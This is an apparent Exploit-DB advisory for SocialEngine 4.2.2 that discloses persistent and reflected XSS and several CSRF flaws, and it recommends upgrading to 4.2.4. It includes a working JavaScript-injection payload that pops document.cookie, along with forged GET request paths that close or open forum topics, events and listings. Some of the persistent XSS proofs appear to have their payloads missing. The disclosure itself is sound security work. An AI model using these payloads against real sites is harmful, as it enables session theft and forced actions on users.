socialengine 4.2.2 - Multiple Vulnerabilities

EDB-ID: 18927 CVE: 2012-2216 OSVDB-ID: 82167...
Author: i4k Published: 2012-05-25
Social Engine 4.2.2 Multiple Vulnerabilities
Earlier versions are also possibly vulnerable.


Product: Social Engine 4.2.2
Remote-Exploit: yes
Discovered by: Tiago Natel de Moura aka "i4k"
Discovered at: 10/04/2012
CVE Notified: 10/04/2012
CVE Number: CVE-2012-2216


Social Engine version 4.2.2 is vulnerable to XSS and CSRF.


SocialEngine is a PHP-based white-label social networking platform that
lets a site owner run a social network on their own website. Main
features include administration of small-to-mid scale social networks,
some customization, unencrypted (non-obfuscated) source code,
multilingual support, and a modular plugin/widget system. A range of
templates and add-ons is available to extend the features included in
the SocialEngine core.


== Persistent XSS in music upload. ==

The software does not neutralize or incorrectly neutralizes
user-controllable input before it is placed in output that is
used as a web page that is served to other users.

Proof of Concept:
POST http://localhost/index.php/music/create

POST data without form-data enctype:

== Persistent XSS in creating events ==


POST data without form-data enctype:
title=teste XSS 3&description=teste XSS 3&starttime[date]=4/9/2012&

== Reflected XSS in search form of events area. ==

JavaScript injected directly (the search term is placed inside a
JavaScript string literal, so a single quote closes the literal and the
rest of the input runs as code):
POST http://localhost/index.php/widget/index/content_id/644

format=html&subject=event_1&search=';alert(document.cookie);var a = '

Proof of Concept:
- Go to URL: /index.php/event/$EVENT_ID
- Click on "Guests"
- Click in the "Search guests" form
- Submit: ';alert(document.cookie); var a = '

You will see your PHPSESSID in the alert, which also shows that the
session cookie is not flagged HttpOnly.

== Multiples CSRF vulnerabilities ==

The web application does not, or cannot, sufficiently verify whether a
well-formed, valid, consistent request was intentionally provided by the
user who submitted it.

A CSRF in the plugin "Forum" allows forcing the owner of a topic to do
activities such as:

Close a topic:
GET /index.php/forums/topic/4/example-topic/close/close/1

Open a topic:
GET /index.php/forums/topic/4/example-topic/close/close/0

A CSRF in the plugin "Event" allows forcing the owner of the event to do
activities such as:

Close the event:
GET /index.php/events/topic/close/close/1/event_id/2/topic_id/2

Open the event:
GET /index.php/events/topic/close/close/0/event_id/2/topic_id/2

"Watch Topic":
GET /index.php/events/topic/watch/watch/1/event_id/2/topic_id/2

"Stop Watching Topic":
GET /index.php/events/topic/watch/watch/0/event_id/2/topic_id/2

A CSRF in the plugin "Classifieds" allows forcing the owner of a listing
to do activities such as:

Open the classified listing:
GET /index.php/classifieds/close/1/closed/0

Close the classified listing:
GET /index.php/classifieds/close/1/closed/1


Tested with version 4.2.2 but earlier versions are possibly vulnerable.


Upgrade to Social Engine 4.2.4.


The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2012-2216 to this issue. This is a candidate for inclusion in
the CVE list, which standardizes names for security problems.

Tiago Natel de Moura aka "i4k"
SEC+ Information Security Company -
BugSec Security Team -

Tiago Natel de Moura
IT Security Consultant